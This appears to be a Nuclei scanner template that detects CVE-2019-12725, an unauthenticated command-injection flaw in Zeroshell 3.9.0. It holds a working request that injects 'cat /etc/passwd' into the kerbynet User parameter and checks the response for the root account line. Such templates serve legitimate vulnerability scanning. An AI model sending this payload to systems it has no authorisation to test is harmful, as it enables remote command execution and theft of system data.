Zeroshell 3.9.0 - Remote Command Execution

id: CVE-2019-12725

info:
  name: Zeroshell 3.9.0 - Remote Command Execution
  author: dwisiswant0,akincibor
  severity: critical
  description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.
  impact: |
    Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the target system.
  remediation: Upgrade to 3.9.5. Be aware this product is no longer supported.
  reference:
    - https://www.zeroshell.org/new-release-and-critical-vulnerability/
    - https://www.tarlogic.com/advisories/zeroshell-rce-root.txt
    - https://github.com/X-C3LL/PoC-CVEs/blob/master/CVE-2019-12725/ZeroShell-RCE-EoP.py
    - https://zeroshell.org/blog/
    - http://packetstormsecurity.com/files/160211/ZeroShell-3.9.0-Remote-Command-Execution.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-12725
    cwe-id: CWE-78
    epss-score: 0.96341
    epss-percentile: 0.99518
    cpe: cpe:2.3:o:zeroshell:zeroshell:3.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: zeroshell
    product: zeroshell
  tags: cve,cve2019,packetstorm,rce,zeroshell

http:
  - method: GET
    path:
      - "{{BaseURL}}/cgi-bin/kerbynet?Action=StartSessionSubmit&User='%0acat%20/etc/passwd%0a'&PW="

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502200b2efe0e2b8798d4ea6ed19ab366fd08035ba9c4a905dc24780917aef1054056022100cbb08eedd02bf4914132fae7e4dcd9cdea870b249faec7e52ba313fa00ea30bd:922c64590222798bb761d5b6d8e72950